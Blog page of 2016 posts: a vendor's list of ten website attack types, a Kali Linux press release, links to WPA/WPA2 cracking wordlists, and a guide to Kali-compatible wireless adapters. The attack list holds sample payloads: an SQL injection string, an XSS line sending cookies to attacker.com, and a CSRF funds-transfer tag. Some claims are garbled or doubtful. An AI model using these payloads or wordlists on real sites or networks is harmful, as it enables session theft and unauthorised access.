Showing posts with label hackers. Show all posts
Showing posts with label hackers. Show all posts

Sunday, 1 May 2016

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE 2016


Ways Hackers Hack Your Site









Pop_quiz:what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?
They’ve all been recently hacked.
Yes, hacking is a growing threat for every business both large and small.
Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time. Defencely have been running analysis since it’s existence on different possible attack vectors and hence has been proven with a record for web application security in India and is currently going global. There are specifics onto which Defencely had been working it’s way onto making a name on the CIO portfolio for it’s immense success with Information Technology Security as a service provider. To an amazement, Defencely has not only stood up to it’s client in the past, but now it has been providing ground-breaking research for all of it’s client with special deliverables given services from Defencely has been opted. But there is a side, which Defencely has chosen to opt for the betterment of the web world, and it’sWHITE HATE ETHICAL HACKING which makes it’s way through corporate business world and provides in-depth security services for an overall web security protection to it’s valued clients. Apart from each of the services provided by Defencely, it has maintained a wise standard onto Bug Hunting and hence a proven excellence for it’s quality deliverables which the Red Team Security Experts. The red team has taken it’s responsibility to represent Defencely in various gratitudes, whether it is on spreading information security concerns, attending information security conferences to providing free of cost industrial hands on penetration test for an initial approach and this alone had resulted in a wise deduction of how security could just be an illusion to the corporate world and how businesses could be ruined over-night.
Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.
In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID='” + request.getParameter(“id”) +”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.
For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:
(String) page += “<input name=’creditcard’ type=’TEXT’ value='” + request.getParameter(“CC”) + “‘>”;
The attacker modifies the ‘CC’ parameter in their browser to:
‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’
This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.
Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).
If a hacker exploits the authentication and session management system, they can assume the user’s identity.
Scary indeed.
Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:
  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?
If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.
Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.
For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:
And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.
Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.
This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.
In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.
It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.
The problem, of course, is that you’re not getting into what you think you’re getting into.
A classic example of a social engineering attack is the “Microsoft tech support” scam.
This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.
Here’s an article on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.
If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.
In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.
In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.
In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:
<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />
In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.
Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
The following vulnerable components were downloaded 22 million times in 2011:
By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.
And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.
It’s kind of like having your car stolen when you really need to get somewhere fast.
The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.
The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

Wednesday, 27 April 2016

Backtrack is dead – long live Kali Linux ! 2016

kali-wp-june-2014_1920x1080_A
This blog was posted on the Offensive Security site as a Press Release. Offensive Security decided to not release yet another version of Backtrack, but to rebuild from scratch. So now we’ll use Kali Linux instead.

Black Hat Europe, Amsterdam – March 13 – Offensive Security today announced the availability of Kali Linux, the evolution of its popular BackTrack Linux, a free security auditing operating system and toolkit. Showcased at Black Hat Europe in Amsterdam, Kali Linux incorporates more than 300 penetration testing and security auditing programs with a Linux operating system, delivering an all-in-one solution that enables IT administrators and security professionals to test the effectiveness of risk mitigation strategies.
“For IT professionals, an experiment is worth a thousand theories. Applied to security, it means that simulating attacks to assess the defenses protecting your organization is the only sure way to understand their effectiveness and the impact of an attack,” said Mati Aharoni, Lead Trainer and Developer, Offensive Security. “That’s why we created Kali Linux; we’ve developed the most advanced penetration testing and security auditing toolkit available to help IT administrators and security professionals put themselves in the shoes of potential attackers.”
The new Kali Linux offers a smoother, easier penetration testing experience, making it more accessible to IT generalists as well as security specialists. The new infrastructure incorporates Debian development standards to provide a more familiar environment for IT administrators. The result is a more robust solution that can be updated more easily. Users can also customize the operating system to tailor it to their needs and preferences.
All the programs packaged with the operating system were evaluated for suitability and effectiveness before being included. They include Metasploit for network penetration testing, Nmap for port and vulnerability scanning, Wireshark for monitoring network traffic, and Aircrack-ng for testing the security of wireless networks.
“When it comes to security, the best defense is offense; you need to test the effectiveness of your own security practices before a real intruder does it for you,” said HD Moore, Chief Architect for Metasploit at Rapid7. “We built Metasploit to level the playing field for defenders; arming them with the same tools the attackers have. Offensive Security takes this even further, bringing hundreds of such tools together in Kali Linux to streamline security auditing.”
Additionally, Kali Linux can now run on a wide variety of hardware and is compatible with numerous wireless and USB devices. It also introduced support for ARM devices – typically miniature, battery-powered computers – which are becoming more prevalent and inexpensive. More information on which devices are supported, as well as other documentation, is available on the Kali Linux documentation site.

PRICING AND AVAILABILITY

Like its predecessor, Kali Linux is completely free and always will be. Offensive Security is committed to supporting the open source community with the ongoing development of Kali Linux. The development tree and all sources are available for those who wish to tweak and rebuild packages. Kali Linux is available immediately for download fromhttp://www.kali.org/downloads/.

ABOUT OFFENSIVE SECURITY

Founded in 2007, Offensive Security was born out of the belief that the only way to achieve sound defensive security is through an offensive approach. The team is made up of security professionals with extensive experience of attacking systems to see how they respond. They share this information through trainingsfree tools and publications. With the motto “Try Harder,” the Company’s trainings and certifications are well-respected and considered amongst the most rigorous available, creating a model adopted across the industry. In addition, theExploit DatabaseMetasploit Unleashed and BackTrack Linux community projects are highly-regarded and used by security teams in governmental and commercial organizations across the world. For more information about Offensive Security, please visit www.offensive-security.com.

Monday, 25 April 2016

WPA / WPA2 Word List Dictionaries 2016

Here are some dictionaries that can be used with Backtrack or Kali Linux. They are plain Wordlist dictionaries used to brute force WPA/WPA2 data captures with aircrack-ng. The BIG-WPA-LIST will need to be extracted before using.

These are dictionaries that have been floating around for some time now and are here for you to practice with. Once you get good at using a dictionary,and if these don’t crack the password for you, it would be a good idea to make your own with Crunch.

I have also included Wordlist that come pre-installed with Backtrack and Kali called darkc0de.lst and rockyou.txt

Due to bandwidth and storage limitations I am using free file sharing servicesMediafire and 4shared to store the files for download.

WPA/WPA 2 Dictionaries

BIG-WPA-LIST-1 MediaFire
BIG-WPA-LIST-1 4shared

BIG-WPA-LIST-2 4shared

BIG-WPA-LIST-3 4shared

darkc0de.lst MediaFire
darkc0de.lst 4shared

rockyou.txt MediaFire
rockyou.txt 4shared

Sunday, 24 April 2016

Top Kali Linux Compatible USB adapters / dongles 2015 - 2016

Top Kali Linux compatible USB adapters / dongles 2015


To do wireless penetration testing with Kali Linux a compatible USB adapter / dongle is needed to be able to go into monitor mode, do packet injections, or be able to do the things necessary while wireless pen testing.

When looking for an adapter that works with Kali it is the chipset of the adapter that enables it to do pen testing.

It is the chipset of the adapter that controls whether it is compatible with Kali or not. Many of these chipsets are installed in different adapters and sold. So if you come across a name brand adapter that has a kali Linux compatible chipset and then see the same chipset in another generic USB adapter most likely it will work. I will list examples of this at the bottom of the page.

It is better to focus more on the chipset rather than the vendor model name.

Whatever you do don’t buy a wireless G only USB adapter. Wireless G is useless unless you are only targeting wireless G routers and devices. Wireless N is backward compatible so it can be used on wireless G or N. Most routers and devices now are setup with wireless N.

Another thing to keep in mind is the range the adapter will have. Small USB adapters are great for staying low profile but their range is limited compared to an adapter with a larger 5 dbi or 9 dbi antenna.

Here are the most common chipsets used with Kali Linux. Any USB adapter that uses these chipsets will most likely work with Kali.

Atheros AR9271
Ralink RT3070
Ralink RT3572
Realtek 8187L (Wireless G adapters)

Alfa adapters continue to dominate Pen Testing in 2015. Here are the top Kali Linux compatible wireless USB adapters with links to Amazon and AliExpress if available.

Adapters that use the Ralink RT3070 Chipset


Alfa AWUS036NH 2.4 GHz…….Amazon
Alfa AWUS036NH 2.4 GHz…….AliExpress.com



Alfa AWUS036NEH 2.4 GHz…….Amazon



Panda PAU05 2.4 GHz…….Amazon




Adapters that use the Atheros AR9271 Chipset

Alfa AWUS036NHA…….Amazon




TP-LINK TL-WN722N 2.4 GHz…….Amazon 
TP-LINK TL-WN722N 2.4 GHz…….AliExpress.com 




Adapter that use the RT3572 chipset 

Alfa AWUS051NH Dual Band 2.4 GHz and 5.8 GHz…….Amazon








Wireless G only USB adapters, Realtek 8187L chipset
The following USB adapters are dongles that were best sellers in the past but since they only support wireless G they have become dated.

Alfa AWUS036H USB adapter 2.4 GHz…….Amazon
Alfa AWUS036H USB adapter 2.4 GHz…….AliExpress.com

Netgear WG111v2 USB adapter 2.4 GHz…….Amazon 

Sabrent NT-WGHU USB adapter 2.4 GHz…….Amazon 



Cheap long range adapter that works with Kali
Here is an example of a cheap long range adapter (48 dBi) that uses the Ralink 3070 chipset that works well with Kali. It does have problems with any version of Windows that is not Windows 7 and does not work with Macs. For adapters that have good support go with one of the above wireless N name-brand-adapters.